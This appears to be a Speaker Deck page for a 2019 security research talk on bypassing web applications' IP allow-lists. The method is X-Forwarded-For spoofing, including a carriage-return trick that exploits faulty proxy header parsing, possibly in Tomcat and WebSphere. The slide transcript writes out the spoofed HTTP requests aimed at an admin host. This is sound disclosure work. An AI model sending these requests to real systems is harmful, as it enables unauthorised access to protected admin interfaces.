Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Speaker Deck
PRO
Sign in
Sign up for free
At Home Among Strangers
Bo0oM
December 06, 2019
Research
1
2.8k
At Home Among Strangers
Bypassing IP white sheets of some web applications due to incorrect parsing of HTTP request headers.
Bo0oM
December 06, 2019
Tweet
Share
More Decks by Bo0oM
See All by Bo0oM
31337
bo0om
0
4
Your back is white
bo0om
0
62
FTP2RCE
bo0om
0
3.8k
Interpret it!
bo0om
0
820
2000day in Safari
bo0om
2
1.8k
Partyhack 3.0 - Telegram bugbounty writeup
bo0om
0
3.7k
Defcon Russia | Bo0om vs Шурыгина
bo0om
0
1.5k
Other Decks in Research
See All in Research
eccoによる言語モデルの可視化 (2022-01-28 NLP Hacks#1)
hikomimo
0
300
CVIM_2022_01
keiichirokagawa
0
440
SketchODE: Learning neural sketch representation in continuous time
dasayan05
0
110
Protecting user agency with local-first software
ept
0
250
ABCIで回そう爆速深層学習 (基礎編)
yoshipon
8
4.4k
ヒトをめぐるデータサイエンスにおけるAIの最新動向.pdf
tdailab
0
170
Celebrate UTIG: Staff and Student Awards 2022
utig
0
110
JGS594 Lecture 18
javiergs
PRO
0
340
再帰化への認知的転回/the-turn-to-recursive-system
monochromegane
0
120
第8回チャンピオンズミーティング・サジタリウス杯ラウンド2集計 / Umamusume Sagittarius 2021 Round2
kitachan_black
0
1.7k
Winnti is Coming - Evolution after Prosecution@HITCON2021
aragorntseng
0
900
Mip-NeRF ICCV2021輪読会スライド
daigo0927
1
230
Featured
See All Featured
Making Projects Easy
brettharned
98
4.3k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
103
16k
Docker and Python
trallard
27
1.5k
Web Components: a chance to create the future
zenorocha
303
40k
Teambox: Starting and Learning
jrom
121
7.6k
Large-scale JavaScript Application Architecture
addyosmani
499
110k
YesSQL, Process and Tooling at Scale
rocio
157
12k
Intergalactic Javascript Robots from Outer Space
tanoku
261
25k
The Invisible Side of Design
smashingmag
289
48k
A Tale of Four Properties
chriscoyier
149
20k
Agile that works and the tools we love
rasmusluckow
319
19k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_i
21
14k
Transcript
At Home Among Strangers Bypassing IP white sheets of some
web applications due to incorrect parsing of HTTP request headers.
Reverse Proxy
None
X-Forwarded-For: <client>, <proxy> X-Forwarded-For: <fake>, <client>, <proxy>
HTTP-request GET / HTTP/1.1 Host: admin.my.site Connection: close GET /
HTTP/1.1 Host: admin.my.site X-Forwarded-For: 123.123.123.123, 192.168.1.1 Connection: close X-Forwarded-For: <client>, <proxy>
XFF/XRI Spoofing GET / HTTP/1.1 Host: admin.my.site X-Forwarded-For: 127.0.0.1 Connection:
close GET / HTTP/1.1 Host: admin.my.site X-Forwarded-For: 127.0.0.1, 123.123.123.123, 192.168.1.1 Connection: close X-Forwarded-For: <fake>, <client>, <proxy>
HTTP-request GET / HTTP/1.1\r\n Host: admin.my.site\r\n X-Forwarded-For: 127.0.0.1\r\n Connection: close\r\n
\r\n X-Forwarded-For: <fake>, <client>, <proxy>
HTTP-request with 0d GET / HTTP/1.1\r\n Host: admin.my.site\r\n X-Forwarded-For: 127.0.0.1\r\r\n
Connection: close\r\n \r\n X-Forwarded-For: <fake>\r, <client>, <proxy>
XFF/XRI Spoofing+ GET / HTTP/1.1\r\n Host: admin.my.site\r\n X-Forwarded-For: 127.0.0.1\r\r\n Connection:
close\r\n \r\n GET / HTTP/1.1 Host: admin.my.site X-Forwarded-For: 127.0.0.1 , 123.123.123.123, 192.168.1.1 Connection: close X-Forwarded-For: <fake> , <client>, <proxy> Tomcat? WebSphere?
Twi: @i_bo0om Site: bo0om.ru Telegram: @webpwn